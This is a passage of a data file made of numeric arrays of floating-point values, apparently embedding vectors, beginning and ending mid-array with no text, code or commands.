,0.009484114,-0.0058873063,-0.009063602,0.00032206078,0.035440743,0.0046941903,-0.034803674,0.021631952,0.005520893,-0.005622776,0.044954166,-0.03685474,-0.036747687,0.019369312,0.02028555,-0.023653936,-0.022997433,-0.0728148,0.010720912,-0.00066032767,0.015845593,0.0156087065,0.04191964,-0.047910497,-0.076890975,0.011090611,0.023866422,0.025247421,-0.04808238,-0.03577573,-0.0604517,0.029587299,0.029412089,0.0046755006,0.00981381,0.018657753,0.050786257,0.047961753,0.022856288,-0.007920171,-0.043365348,0.052177507,-0.021016773,0.032269776,0.022713358,-0.0354065,0.035830576,0.04364074,0.05131754,-0.009248636,0.03700212,0.06468871,-0.021252552,-0.019132515,-0.024914155,0.030819802,0.04002479,0.078711785,-0.030550499,-0.020179857,0.058989424,0.021347215,0.020927634,0.050682053,-0.0020389992,0.099829264,-0.03247357,0.03514326,0.04008594,0.047750726,0.04529328,-0.028251126,0.029783892,-0.07297833,0.026518429,0.0067094746,-0.031740006,-0.0052371635,-0.0384234,0.035245333,0.06658172,-0.0373715,-0.022216208,0.02815026,-0.037925024,-0.005729762,0.0031378912,-0.050059184,-0.017661277,0.019651828,0.061039235,0.030688303,-0.01003337,-0.021693967,-0.014841635,-0.01203301,0.030166043,-0.0039283475,-0.057860762,0.0061449665,-0.025725046,0.0016842674,0.061591458,0.038215116,-0.035866737,-0.05585732,-0.02159604,-0.01226378,0.05383596,0.00000794911,0.004313879,-0.016707331,0.05784914,-0.002917138,-0.009805236,0.019483456,-0.008471608,0.069143005,-0.05279238,-0.067712605,0.007127669,-0.008776073,0.0111615565,-0.0007422971,-0.006438927,0.03823401,-0.038661957,0.049673747,0.027086202,-0.03896604,-0.037762597,0.04702221,-0.026129179,0.025998125,-0.007863569,-0.03761728,0.037630137,-0.00445997,-0.08186234,0.038747534,-0.026221761,0.03916569,0.010373437,-0.05551192,0.012610877,0.033415508,0.053895123,-0.01324903,0.008750224,0.0075798957,0.02612357,0.0008444203,0.0432144,0.062085446,-0.030183796,-0.00072843645,-0.037239075,-0.025253505,0.01867048,0.016794967,-0.074644215,0.033453543,-0.057416387,0.019260155,-0.03266967,0.0012761981,-0.00909999,-0.022323338,-0.0699211,-0.05903109,-0.035424717,-0.057098694,0.021083066,0.11943427,0.011325955,0.018117212,-0.021456059,-0.021893557,-0.050063495,0.012731578,0.028360633,0.010632622,-0.058773145,0.006461288,-0.00983625,0.012137206,-0.0132028125,0.016270427,0.01246992,-0.039648976,-0.054597314,0.01718942,-0.0816605,0.016007049,0.023455314,-0.037229437,0.022043817,-0.06491863,-0.011402336,-0.010677292,-0.050660774,-0.01532353,-0.04444702,0.05171636,-0.09094429,-0.0047044735,-0.035175405,-0.018025158,-0.0068281754,-0.07173206,-0.028150203,0.015865158,0.0028699331,0.06579962,-0.060554445,0.022498608,0.03788507,-0.011202833,-0.016450778,0.009683727,0.03364939,-0.0039889906,0.0059289057,-0.009508572,-0.013332481,-0.021460546,-0.07476641,0.07860233,0.0041418383,-0.006440011,-0.016299047,-0.029756889,-0.04743573,0.051805332,-0.051334985,0.005572839,-0.034396976,-0.0030418653,-0.030700833,0.006481189,-0.0055681444,-0.03764255,0.007491143,-0.024530828,0.020331645,-0.10678024,0.0054595997,-0.011875034,0.027088055,-0.0038182773,0.04951761,0.041473065,-0.010467965,-0.009558496,0.01867453,0.02610609,-0.027967533,0.028977541,0.08910329,0.05594028,-0.012488913,0.08355378,0.039321356,0.025484078,-0.04573899,-0.027203977,-0.008790669,0.03871543,-0.004458308,0.0077964696,-0.032976273,-0.018079333,-0.03890411,0.013383949,0.016633552,0.037619192,-0.009518161,-0.01980779,-0.008554331,0.0043884497,-0.0075183613,0.077432856,0.02301298,-0.053864848,-0.021529289,0.037760828,0.01834555,-0.011460082,0.02987337,-0.0078075896,-0.009954483,-0.0024325752,0.012807018,0.029512929,-0.011821553,-0.023252428,-0.010542713,-0.019778077,-0.020186996,-0.040162284,-0.04841608,-0.033897307,-0.022554988,-0.029113026,-0.018812718,-0.046789587,0.050372027,-0.0027157376,-0.023198275,-0.005373645,0.07735335,-0.01199346,0.0011101614,-0.017585449,0.043115597,-0.0071371766,0.006405243,0.0064485567,-0.030530002,-0.018185357,-0.04299802,-0.03532488,-0.016797112,-0.018329008,0.035500407,0.033591166,0.010010831,-0.021671295,-0.05218283,0.007122907,0.08869902,0.024355808,-0.01949695,-0.03021721,-0.000039263967,0.030188426,-0.038074214,0.003744802,-0.08070364,0.018506866,-0.039667234,-0.026872827,-0.061631743,-0.0882575,0.036776703,-0.0022341849,0.03644968,0.027375918,0.01865811,-0.09765738,-0.010848514,-0.08538857,0.019409977,0.015526908,0.049482554,-0.008594857,-0.0045815343,0.036394335,0.06956376,-0.030775426,-0.0044867513,0.025433067,0.02320737,-0.04133075,0.031016087,-0.03270384,0.005755591,0.015770251,0.033005636,0.10135287,0.03676307,0.00031962566,-0.036017075,0.058736738,-0.0037834244,-0.053737067,-0.02080661,-0.028904768,-0.013800264],[-0.015382029,0.078360416,-0.17406577,-0.11614486,0.0776831,-0.01245258,0.03569664,0.019062662,-0.040687412,-0.04306474,-0.034152277,0.036281332,0.07103271,-0.016080454,0.009094321,-0.042939845,0.0021591207,-0.06680063,-0.0418521,0.054994985,0.023670638,-0.01926521,0.007299506,-0.046971027,0.06909458,0.029874388,-0.008356931,-0.008705863,-0.016981764,-0.026620181,0.034139466,-0.027937919,-0.030281914,0.013179226,-0.046621066,-0.013030662,0.013059567,0.039862785,-0.015220973,0.0026718255,0.06163634,0.01306019,0.04013622,-0.033079688,-0.01697373,0.0084381895,0.027560065,-0.005117028,0.07275863,-0.05071204,0.017083587,0.013436764,-0.012397477,0.02562107,0.07450283,0.03947288,-0.016485594,-0.021101188,-0.018731719,-0.044386845,0.11876539,0.060503453,-0.09073332,0.053251915,0.027754033,-0.026850853,-0.033329934,0.030367402,0.04392912,-0.054662418,0.03412153,0.032667376,-0.013502139,0.041367378,-0.049473766,-0.047826666,-0.0044944813,-0.016819842,-0.021169653,0.024745516,0.051521122,0.0086808,0.083318025,0.023230892,0.057631757,-0.033381443,-0.06404792,-0.006509477,-0.05501161,0.09239576,0.013415672,0.003438853,0.014688451,-0.02238965,-0.042053234,0.0036802727,-0.007577041,0.0183748,-0.029570902,0.014333597,-0.030024355,-0.016201217,0.011952077,0.0049777795,-0.0009641144,0.04626152,-0.007837104,-0.0041938904,-0.008414689,-0.00807776,-0.040627737,0.058205467,-0.040998176,-0.0035011051,-0.05211059,-0.035553407,0.03559581,-0.026135964,-0.0056793364,0.03927683,0.025593031,-0.029900594,-0.013164734,0.036571525,-0.051548325,0.024196638,-0.066537194,0.026509374,-0.025260556,-0.039975625,-0.011866096,0.002152067,-0.043307558,-0.020546004,0.01856913,0.07773621,-0.07907588,-0.019121803,0.008054923,0.054493077,0.023617262,0.015321867,-0.036524206,-0.02821148,-0.008650624,-0.01841259,0.020868417,-0.05700787,-0.041263614,0.028423877,0.040066265,0.049383316,-0.027319716,0.0064736987,0.032110777,-0.0075126733,0.0076585985,-0.022649841,-0.0044767708,0.010005409,0.026538374,0.009381934,-0.0081570055,0.043752488,-0.004750039,-0.04525627,0.0016936848,0.03871243,0.017007671,0.045880284,-0.08983872,-0.027650394,-0.0051108254,-0.019675875,0.01482967,-0.0000015042543,0.0629676,-0.038548127,0.04177871,0.015884964,0.023202457,-0.053887673,0.06432497,0.010535455,-0.03491199,-0.024655955,-0.030752223,0.0005402503,0.016086182,-0.040294614,-0.011016282,-0.011320477,-0.05750509,-0.03342693,-0.037015602,-0.049705066,0.02193623,0.017229998,0.049099613,-0.036897387,-0.026457515,-0.015247967,-0.063086025,0.026091916,-0.023913696,0.043749984,0.043094862,0.0729396,-0.0051775523,0.022071734,0.04902762,0.00975648,0.032117303,0.038953792,0.031808704,0.02403473,-0.009752483,0.0061069955,-0.0023828,-0.017175306,-0.0023773902,-0.008100875,-0.0022394047,-0.026051573,-0.008936342,-0.028350933,-0.070597656,-0.0034153813,-0.03196751,0.012756717,-0.013548317,-0.069185026,0.021854348,-0.010628649,0.008835737,0.029054217,-0.03286587,0.055948462,-0.037467536,-0.005231408,0.022535814,0.07166867,-0.01416492,-0.0044822204,-0.021669991,-0.029477797,0.008348131,0.0031407112,-0.0016988433,0.026348159,-0.03229416,0.020207712,0.01642579,0.013055991,0.021170499,-0.016228305,-0.027934192,-0.009799705,0.008099886,0.0056669624,0.047533415,-0.029068796,0.006649973,-0.042374074,0.031833977,-0.0086317295,-0.011416923,0.008193697,0.020061005,0.034390662,0.026552951,0.0031974146,0.0202105,0.008454547,-0.011977999,0.041874047,-0.005300181,-0.042661194,-0.03815798,-0.0059294086,-0.035332453,-0.038848516,0.0013690848,0.015261425,0.0227812,0.009092767,-0.019343667,-0.023202067,0.002106181,-0.01533459,0.04327583,-0.007416963,-0.016796917,0.009200793,-0.02361064,0.020145575,0.026032995,0.049270183,0.023859408,-0.04034288,0.009970252,0.02717238,0.053323194,0.041330844,0.026648244,-0.028156566,0.020510783,0.026088014,0.018779626,-0.046366375,-0.09091668,-0.0010050365,-0.05361358,0.010533076,-0.051254816,0.026399998,0.045439195,0.039012387,0.051406957,-0.01267123,0.049677487,-0.02697373,0.0052989237,-0.05695862,-0.01752555,0.07415634,0.00601632,0.013344843,0.0105730025,-0.026097612,0.029726475,-0.0015280015,0.04888671,-0.022453312,-0.0070426525,0.026798055,0.009143286,-0.006154822,-0.0008751849,0.038034152,0.032411978,0.0016004791,-0.00005686138,-0.013424463,0.0013743861,0.014040216,-0.020741096,-0.030752532,0.04356814,0.022089548,-0.021972366,0.03203483,-0.030135052,-0.033889968,0.029123556,0.032924555,0.04508885,0.025896274,0.018239334,-0.04291243,0.036041062,-0.024123803,0.022609275,0.007813316,-0.0047469283,-0.013759125,0.05233473,0.005924732,0.05817953,0.029492496,0.0042402586,-0.012291112,-0.021450633,0.04312565,-0.03290481,-0.021210762,-0.09831155,0.02005617,-0.010276073,0.005190094,0.02872982,0.010598496,0.012222509,-0.00002245423,0.0076523675,-0.019375885,0.04185066,-0.034134742,-0.0049355235,-0.0029656896,-0.033348504,-0.008550755,-0.05088822,0.011330154,0.0104088085,-0.042196296,0.049648583,0.01821925,0.036789525,0.048895895,-0.05900431,-0.03248183,0.011930527,-0.01747751,-0.029020721,0.029597552,-0.022060852,-0.010846559,0.04719616,0.01642843,0.014240629,0.0119364895,-0.0032751565,-0.060927168,0.015933514,-0.0063286386,0.05944931,0.007273504,-0.02339399,-0.016135342,0.034143407,0.007895902,0.03920734,-0.011210149,0.008520436,0.04798814,0.026818996,0.028133744,-0.0096341865,-0.02880488,0.061893806,0.017005028,0.016634375,-0.009461948,-0.01820078,0.00010070375,0.018818792,0.018148951,-0.030761441,-0.0036467062,0.030017741,-0.044085875,-0.04994828,-0.04261947,-0.016390767,0.0471156,0.045560066,-0.036099102,-0.06842983,0.06064011,0.04963264,0.028846031,-0.008133844,0.044339683,0.13430168,0.008586837,0.016461834,-0.031308953,0.036759652,0.0030322068,-0.0073559536,0.020763969,-0.05428089,0.026317727,0.03089083,-0.03909591,-0.015325968,-0.04182724,0.053312954,0.0502167,-0.034229856,0.006250652,0.0040679327,-0.0638242,-0.019488549,0.029368948,-0.027702881,-0.0041052983,0.031359907,0.067172475,0.058554344,-0.026736857,-0.07010694,-0.0504216,-0.022869632,0.06710375,0.027103508,-0.017664226,-0.011930819,-0.0043781023,0.027592234,0.008917092,0.049212404,0.01395615,-0.03192942,-0.015618638,-0.036956064,0.011053828,0.033582315,-0.009678189,0.043326296,0.05226011,-0.032777358,0.001449357,0.028650232,-0.015701715,0.03900015,-0.046155833,-0.06672145,0.017542114,0.015849842,0.013824554,0.008014214,0.022431314,0.01461083,-0.0139621645,0.044451654,0.0046574445,-0.041211117,0.00728373,-0.0153121725,-0.013893618,0.0029160373,0.015721263,-0.06535336,-0.0071598156,0.066252045,-0.04676077,0.017857248,0.0006517442,0.03147749,0.03964256,-0.03275974,-0.021674354,0.006758583,0.02250424,-0.054569945,0.013687644,0.023008129,0.014021093,0.014212617,0.041405905,0.009485987,-0.046678446,-0.022563834,-0.015795754,-0.036164925,0.028471261,0.013845174,-0.11095438,0.052699104,-0.07950382,0.00024135044,-0.040132936,0.0037857927,-0.022337029,-0.01207047,-0.020402858,-0.028822644,-0.037299614,-0.05925525,0.014488903,0.072750784,0.030642565,0.012708644,-0.0303756,-0.03611037,-0.009182467,0.016969435,0.018972648,0.03628349,-0.061443076,-0.016223399,0.0001701608,0.01570711,0.009860056,0.024503414,0.022773186,-0.064290695,-0.05836468,0.024301136,-0.05633483,0.01979793,0.013188156,-0.0374962,-0.025646526,-0.05790369,-0.025028048,-0.027867997,-0.013318489,-0.023838617,0.030947128,0.010817484,-0.046982914,0.014991697,0.006312842,-0.0068323715,-0.00605208,-0.05899386,-0.07830789,-0.039116584,-0.01587703,0.059452176,-0.019712908,0.025055133,0.071129784,0.010529939,0.011851138,-0.0023058807,0.016814148,0.03527803,-0.002067462,-0.039380338,-0.018777028,0.015862234,-0.06617666,0.08843236,-0.0010028656,0.0027339878,-0.030027386,-0.0067891814,-0.056995545,0.06054776,-0.047294077,0.026778564,-0.043378733,-0.040731758,-0.03331392,-0.01640923,0.02376621,-0.042254094,-0.00014483936,-0.043239396,0.005883918,-0.084231436,0.008542494,-0.012297007,0.015605956,0.018135883,0.034723252,0.03385058,-0.02026893,-0.009060444,0.017038584,0.06592377,0.012579222,0.049141534,0.07473748,0.064064644,-0.021194967,0.03592198,0.09792494,0.026462125,-0.009245015,-0.008411964,-0.003120099,0.04693887,-0.02900006,-0.059617337,-0.008610071,-0.018888365,-0.0423867,-0.050283775,0.010087241,0.023062257,-0.011885718,0.0069700037,-0.030215193,-0.043682188,-0.021354921,0.03847755,0.039392345,0.016035827,-0.051588405,0.020731589,-0.0014090295,0.041731633,0.035554778,-0.019162565,-0.01769296,-0.022689188,0.028176986,0.02008841,-0.025561078,0.004649279,-0.025468918,0.0067994744,-0.04184102,0.0020334616,-0.031671092,-0.028248288,-0.019260362,-0.0092282295,-0.034422535,0.0016793206,0.00292527,-0.02224347,-0.027052267,0.00088111067,0.1335876,-0.006320297,0.0044353995,0.027482193,0.026715022,-0.01838175,-0.024331586,0.029786542,0.016928038,-0.0063931835,-0.07737443,-0.034393538,0.018926946,-0.032455288,0.060693048,-0.010557123,0.032662474,-0.03561035,-0.005072159,-0.0045083375,0.0039160685,0.06250085,0.009996894,-0.06702951,0.013545299,-0.016665041,-0.012710392,-0.0026359116,-0.021179697,0.0102374805,0.0012327693,-0.008590806,-0.03506921,-0.051616687,0.05718129,0.017055787,0.07279848,0.025906416,-0.027415873,-0.04051589,0.022652915,-0.04494738,0.05228101,-0.016537167,-0.00068361004,0.0052883336,0.0064722463,-0.03659428,0.062062163,-0.049276832,-0.044466056,0.018868348,0.0022422585,0.022844655,-0.015615381,-0.014133027,-0.0008975268,-0.022188531,0.0510735,0.118529394,0.020726843,0.018290328,-0.021536518,0.06387529,-0.0032665085,-0.06223853,-0.008500645,-0.0136885485,-0.012943113],[-0.022689033,0.074658304,-0.19698545,-0.08773046,0.056807205,-0.022285957,0.045557518,0.03315837,-0.030107357,-0.0401593,-0.021419358,0.048202753,0.07479317,-0.021246333,0.0057315244,-0.011901967,0.0025831086,-0.095777616,0.0029914696,0.025608124,0.031886857,-0.012470254,-0.010124209,-0.04881517,0.0454555,0.033818632,-0.008468206,-0.0175029,-0.01900507,-0.03021231,0.017639687,-0.06649217,-0.025657576,0.0038571684,-0.028657196,0.010104502,0.046210513,0.025539909,0.021010458,-0.0029774178,0.063921355,0.0055955853,0.04164409,-0.0434397,-0.0030859641,0.023505965,0.016697183,0.018405309,0.05764916,-0.045658603,0.017228978,0.024223406,-0.0008305434,0.03550043,0.070385955,0.025593905,-0.035537515,0.010592964,-0.008496853,-0.042553566,0.09542014,0.053758845,-0.08537807,0.032047532,0.0090935435,-0.0287018,-0.023867166,0.02308947,0.05183871,-0.028089099,0.01869835,0.019131584,-0.029649805,0.055154126,-0.046613336,-0.042424075,-0.010806462,0.02472052,-0.018093992,0.05942955,0.017690985,0.025817813,0.06491424,0.023973823,0.054133315,-0.05000639,-0.058031913,-0.0029796243,-0.04260981,0.098061085,0.009080288,-0.01112185,0.009235382,-0.024474593,-0.038804755,0.049779672,-0.01076927,0.03341213,-0.054661885,-0.0021063595,0.014096052,-0.015423994,0.034052536,0.000035788154,-0.0022946608,0.037251968,-0.018672181,0.02703038,-0.04875932,0.0049174274,-0.06964292,0.062063124,-0.016364645,0.012987827,-0.026767163,0.026730604,0.05576575,-0.016698837,-0.03732545,0.033600852,0.019504305,-0.031215757,-0.0018899761,0.030996576,0.0030772116,0.004439781,-0.07146575,0.015103158,0.0067681074,-0.0502255,-0.01741149,-0.018147092,-0.02318899,0.0150871575,0.009734226,0.061789874,-0.021679895,-0.008550864,-0.0049570356,0.02159577,0.019659543,0.029916648,-0.03026012,-0.023837985,0.00045981427,-0.042451087,-0.0013217987,-0.03670838,-0.050249714,0.026920054,0.042248577,0.014965515,-0.019685391,0.016739007,0.03019343,-0.027680872,0.0044541094,-0.022422332,0.012217483,0.02501815,0.016292289,0.003418723,-0.018651426,0.054549426,0.03163776,-0.04626532,-0.017920654,0.013375965,0.020744588,0.06395591,-0.08455331,-0.025692368,0.020331021,-0.016974896,0.013439379,-0.011338413,0.09766688,-0.032802097,0.011354614,-0.009311181,0.052317653,-0.040356938,0.07168892,0.011994824,-0.028054701,-0.020486284,0.0020945794,-0.012297383,0.037273273,-0.013488558,0.00929438,-0.019046519,-0.091608636,-0.050731253,-0.041750968,-0.054431245,0.017997313,0.005099761,0.022898786,-0.030841604,-0.010567561,-0.046809867,-0.05381195,-0.001894978,-0.022167832,0.052708954,-0.007965624,0.066250324,-0.0100874305,0.02225168,0.033150915,0.0041181403,0.00789511,0.049123447,0.022383312,0.023171516,-0.0073109893,-0.0144191645,0.013622341,0.000890234,0.0161425,-0.016548377,0.011158375,0.006829807,0.010494391,-0.018177379,-0.06770465,-0.013082006,-0.0084784515,-0.0099181235,0.0075593134,-0.096532725,0.000432449,0.0050148647,-0.008298812,0.036291245,-0.029541811,0.034930322,-0.03315223,-0.013654502,0.020766841,0.07305857,-0.021225665,-0.0014655453,-0.025072455,-0.0337055,-0.009717904,-0.025570035,0.031226046,0.016296387,-0.01600613,0.0107365,0.020127518,0.01892517,-0.00041243853,-0.0105241425,-0.013998542,-0.0025537708,0.026566729,0.024419375,0.027552905,-0.018548824,0.028201304,-0.041407038,0.020430101,-0.0070667807,-0.024788655,0.012414075,0.023577936,0.008543005,0.0367436,0.025222,0.025335917,0.028811507,0.012440968,0.052972853,-0.0105748065,0.0017044629,-0.05705629,0.0114221005,-0.038776044,-0.048530217,-0.009833893,0.021043275,0.011369094,0.009468664,0.0023911404,-0.026327807,0.015496786,0.014388426,0.016074877,-0.025809726,-0.02657107,0.041248288,-0.03421344,0.04567102,0.05067154,0.00019835171,0.0036776594,-0.05504879,-0.0025529647,0.049772244,0.06699166,0.034070943,-0.0006937253,-0.03640887,0.056347113,0.038813327,0.010421441,-0.04447967,-0.06274126,0.02551754,-0.043493107,0.017817823,-0.01506067,0.0067951134,0.034397434,0.04153756,0.05058638,-0.024993723,0.047185108,-0.04296009,0.0005105544,-0.06227428,-0.029691389,0.04200208,0.014214038,0.03566443,0.0048997207,-0.01334485,0.0628647,0.014234579,0.020435082,-0.0052830614,-0.032006416,0.043355353,0.016414898,-0.01878301,0.02247,0.051194526,0.0013829898,0.017942201,-0.012298369,-0.014815031,0.011931981,0.009003045,-0.026091943,-0.026921568,0.034915682,0.022031734,-0.0054482864,0.016354665,-0.020064833,0.002362229,0.032068513,0.059248958,0.02810045,0.019761276,0.03747762,-0.034672976,0.05604355,0.009853247,0.033846855,-0.023543239,0.006140289,-0.016205624,0.04841736,0.0023432865,0.02958013,0.017815588,0.031362526,-0.05382933,-0.016808722,0.024702718,-0.060812175,0.007302247,-0.076258294,0.04075457,0.0065361275,0.008076798,0.035303697,0.016705655,-0.0000063036114,-0.0031703704,0.021924565,-0.010442053,0.02191736,-0.06473571,0.008001465,-0.006274465,0.003911297,-0.014762305,-0.03156221,0.03927327,0.008325393,-0.059762925,0.046264242,-0.0048427843,0.018140964,0.077481285,-0.0593572,-0.042495422,0.0038315146,-0.022144178,-0.031374272,0.026931003,-0.08684006,0.0019466449,0.049575638,0.045261145,-0.0014328685,-0.008853193,-0.033957373,-0.03731421,0.011045375,0.011638804,0.061987836,0.008488816,-0.011188768,-0.0418232,0.036880024,0.026358427,0.036808062,-0.011863886,-0.01287338,0.027294328,0.030208416,0.035352208,0.031496357,-0.025089916,0.06329569,-0.013752059,0.027736342,-0.0006308416,-0.008077504,0.009161194,0.024239685,0.04770175,-0.025750658,-0.008969538,0.038849477,-0.04109248,-0.038607154,-0.02863953,-0.006468189,0.053373877,0.062223922,-0.031332407,-0.05184483,0.05383004,0.034367383,-0.0030121165,0.045966808,0.03516744,0.11481444,-0.037345197,0.01721584,-0.006136095,0.041664522,0.021548223,0.006186403,0.026063051,-0.05573332,0.013618448,0.011171149,-0.015719844,-0.031914484,-0.035143796,0.07118869,0.09359007,-0.04521146,-0.008317561,0.0006509876,-0.054541934,-0.0109988,0.018829916,-0.05691727,-0.006221593,-0.0087383045,0.05079626,0.040605225,-0.041146312,-0.03002537,-0.03949502,-0.005337095,0.039863195,0.03048723,-0.018612122,-0.04282355,-0.01274995,0.047840737,0.030065896,0.05742535,0.025829617,-0.027514657,-0.03593417,0.007589131,0.0041555986,0.04759494,-0.018059967,0.01810851,0.04663421,-0.021403184,-0.0049048276,0.05666734,-0.027510028,0.021120414,-0.061966874,-0.07980064,0.02160997,0.0032415828,0.015653852,0.010641223,0.029109176,0.016593765,-0.018451054,0.036218613,0.034032583,-0.037043497,0.0017610101,-0.008418716,-0.02839831,-0.026236402,0.010589209,-0.0670623,-0.002186771,0.03001584,-0.042626373,0.008873404,0.0010914127,0.052357785,0.015876103,-0.061128546,-0.0048793717,0.010614829,0.008993888,-0.03529098,0.0058610435,-0.0009285847,0.060481377,0.0018488972,0.04308439,0.030293046,-0.052169677,-0.03926847,-0.03619068,-0.053006962,0.028585484,-0.0007604241,-0.100082055,0.0402045,-0.044839602,0.009501267,-0.022569114,-0.004808706,-0.030293366,-0.013623976,0.011215345,-0.038825445,-0.025198413,0.001371337,-0.00015024451,0.078177415,0.039041556,0.01709213,-0.0027856801,-0.016526178,-0.040185034,-0.00803502,0.0034070665,0.005329328,-0.076199204,-0.02444446,-0.0031765776,-0.010706983,0.012716729,0.0018906562,-0.008507365,-0.038866334,-0.06672298,0.029178143,-0.015316163,0.028303197,0.047012165,-0.06221308,-0.013077578,-0.04730726,-0.04303904,-0.03658295,-0.014678481,-0.02277924,0.004151287,0.01960043,-0.080737755,0.021995312,0.021282284,0.019240426,-0.04594111,-0.08626988,-0.06175323,-0.016076421,-0.045001496,0.032893565,-0.046297822,0.028771374,0.031326678,0.009695953,-0.010539138,0.0033788274,0.024620589,0.014795128,-0.009935393,-0.07004921,-0.029659675,-0.0111044925,-0.08095825,0.08042653,-0.0047327243,0.006579112,-0.04089881,-0.022601405,-0.04400234,0.041098393,-0.0638083,0.012414768,0.0031890878,-0.012851846,-0.0660061,0.008705332,0.045124214,-0.05118587,-0.009294631,-0.029930906,-0.0151898535,-0.09686129,0.0094780885,-0.028115349,0.031932447,0.013854552,0.03025967,0.041123983,-0.012698099,-0.0043840944,0.0068521863,0.041566838,0.006719584,0.049381495,0.07040368,0.05086653,-0.03157756,0.06398217,0.07755395,0.021597587,-0.014846817,-0.01098456,-0.004331025,0.053493556,-0.010429811,-0.040589113,-0.030388353,-0.020854533,-0.027454324,-0.041898683,0.017864624,-0.002516993,-0.0022766744,0.012807841,-0.03258146,-0.051771477,-0.026370525,0.0472476,0.02598268,0.0092978785,-0.03818469,0.041834418,-0.00019011175,0.005128307,0.023674512,-0.03213373,-0.041530132,-0.02235384,-0.00087261735,0.029608205,-0.039697014,-0.027155098,-0.0069804993,-0.018611617,-0.06673288,0.019482497,-0.012729755,-0.04406133,-0.01889821,-0.012036162,-0.03760515,-0.0026054808,-0.026771843,-0.02570461,-0.037410427,-0.019554922,0.08716915,0.009692404,0.048492376,0.006110889,0.03935964,0.006735372,-0.0063890573,0.046114743,0.005182961,0.0070512625,-0.0626565,-0.006888008,-0.015429864,-0.06472171,0.047147844,0.0096019,0.016452393,-0.046456404,-0.019015966,0.02556437,0.025239348,0.028126672,0.006807422,-0.022358745,0.011818068,0.006902756,0.0026390506,0.031142596,-0.020585688,-0.00079501467,-0.002820031,-0.0016897137,-0.040465754,-0.05186809,0.08772506,0.015360219,0.033758346,0.03507156,-0.029181277,-0.05239069,0.011705585,-0.047115758,0.04684829,-0.017806191,0.0012581379,-0.0013601937,0.016882647,-0.05787998,0.031925965,-0.036780093,-0.061128713,0.024358932,-0.004260535,0.013552663,-0.016252544,-0.013836378,0.020833103,0.024574475,0.018282428,0.10294164,0.018133337,0.005322088,-0.033790343,0.051333606,0.011009355,-0.08001307,0.011895481,-0.03175299,-0.011598698],[-0.001411002,0.0488265,-0.16552512,-0.08845569,0.07395385,0.012384489,0.051468663,0.021756776,-0.023533173,-0.0039851707,0.018717028,0.01860466,0.11849962,0.024441991,0.013195902,-0.0436815,-0.020819563,-0.056251425,-0.012745226,0.06239131,-0.019238286,-0.038604006,0.0009000489,-0.057766784,0.06199746,0.0069254395,-0.024270412,-0.018846665,-0.042172004,0.0066279294,0.010894116,-0.0038216698,-0.038527433,0.029606812,-0.07811396,-0.06981695,0.030686231,-0.011321136,-0.008963049,-0.0033334997,0.062384255,0.011174255,0.0124127,-0.059280977,0.009172189,0.016575312,-0.0014183394,-0.048837792,0.057904355,-0.059352674,0.033366784,-0.027486363,0.0042227223,0.032900777,0.05991099,0.040297206,0.012241032,0.025606092,0.012230843,-0.083602436,0.068469346,0.06181375,-0.07975389,0.06360574,0.0037044457,-0.0012401046,-0.027408946,-0.00033549507,-0.0026986727,-0.06959389,0.052039444,-0.009797917,-0.00053887285,0.042683218,-0.0077177123,-0.0029715362,-0.0209218,-0.033344608,-0.02443557,0.023170434,0.013983974,-0.036517955,0.06863151,-0.00035656488,0.026949052,-0.000101056474,-0.034147814,-0.009395665,-0.015603123,0.07166541,-0.0074821697,-0.026716316,0.0021871403,0.0026427296,-0.058835372,-0.034171756,-0.02257321,-0.020156663,-0.042573154,-0.005419387,-0.054767925,-0.023088397,0.019175244,-0.03386797,0.016141083,0.03926035,-0.00672577,-0.005655953,-0.028396899,-0.017619444,-0.015918111,0.048828162,-0.038440064,0.009908445,-0.022163557,-0.0073201335,0.042714212,-0.023713253,-0.013649515,0.061342303,-0.0036667716,-0.0683708,0.003471897,0.05537406,-0.005591408,0.037415024,-0.07859484,0.013944622,-0.013689069,-0.00879629,-0.02708356,-0.0027714507,-0.05381141,-0.0024472098,0.0027603959,0.0540858,-0.010667918,-0.0565703,0.04773359,0.04558056,0.03699796,0.03627055,-0.0377294,-0.022222485,-0.030375438,-0.025944514,0.017379992,-0.013723586,0.0032969115,-0.012593178,0.029248778,0.031768177,-0.0017130118,0.009250602,-0.004274552,0.007100399,0.026773712,0.0035501248,0.013487858,0.02633887,0.0489161,-0.0012988154,-0.042454746,0.05278863,0.011345131,-0.03545573,-0.014095053,0.0072437227,0.007072666,0.018871108,-0.046338405,0.008208958,-0.007459866,-0.008859137,0.0232758,-0.0070865867,0.07129624,-0.040395297,-0.013053585,-0.035066377,-0.0012173104,-0.036066193,0.026869766,-0.0009872194,0.0042143133,-0.01645784,-0.047256414,-0.00021184028,0.03837478,-0.06569962,0.015563769,0.00032893033,-0.07026354,-0.0032462545,-0.059219923,-0.032244753,0.03607995,-0.0054384377,0.03464627,-0.048459318,-0.04789113,-0.0059444685,-0.061740667,0.043441072,-0.059572462,0.07657205,0.029474957,0.030699944,-0.06939208,0.040991876,0.11187873,0.008110736,-0.00066512637,0.0005132619,-0.0015807722,0.04149307,-0.012151096,-0.028896313,-0.026534293,0.042103853,0.025564563,-0.004184966,-0.0014303004,0.02556913,0.0049618217,0.00240227,-0.0361399,-0.02670851,-0.04888033,0.0023600005,0.015213743,-0.044640273,0.053186666,-0.009842804,0.025572544,0.054905538,0.006540754,0.04286227,-0.0023756258,0.0152693605,0.023650914,0.059792258,-0.014015226,0.013916932,-0.037315566,-0.052222695,0.019219393,0.010907399,-0.019010914,0.03578156,0.00739185,-0.016054282,-0.0035952493,0.036251437,0.027746612,-0.03942947,-0.0089695295,0.045156263,-0.012830911,0.026576364,0.058952518,-0.057340678,-0.036139924,-0.033375032,-0.05321035,-0.02215429,-0.049091376,-0.020034105,0.01201865,0.0016739058,0.04409929,0.03442525,0.0088099735,0.020679591,0.0104698185,0.017742956,-0.033020195,-0.018315662,-0.013544797,0.0448044,-0.020905508,-0.04930857,-0.035201903,-0.0016615525,0.028386343,0.062222544,0.009610089,0.01831661,-0.008202896,-0.015532017,0.022718707,-0.019163242,-0.06641777,-0.004956962,0.018070469,0.011732061,0.034810245,0.038567692,0.021448798,-0.048058484,0.02059911,0.031847917,0.07014073,0.032181747,-0.008474816,0.0010201116,-0.008698589,-0.0151639255,0.001907114,-0.016866926,-0.058174055,-0.034179583,0.0108572645,-0.03399572,-0.028195124,0.022453465,0.029857738,0.027834652,0.01658207,0.033539303,0.013058013,-0.022737257,-0.023910537,-0.046304844,-0.014491993,0.06317118,-0.029542686,0.012976136,-0.02734883,0.03251563,0.039336078,0.032644212,-0.0021878271,-0.04611741,-0.029566463,0.033997577,0.05937907,0.017980715,0.034481782,0.005912981,0.039540544,-0.023371622,0.007902715,-0.030639116,0.0029970144,0.023209283,0.009901792,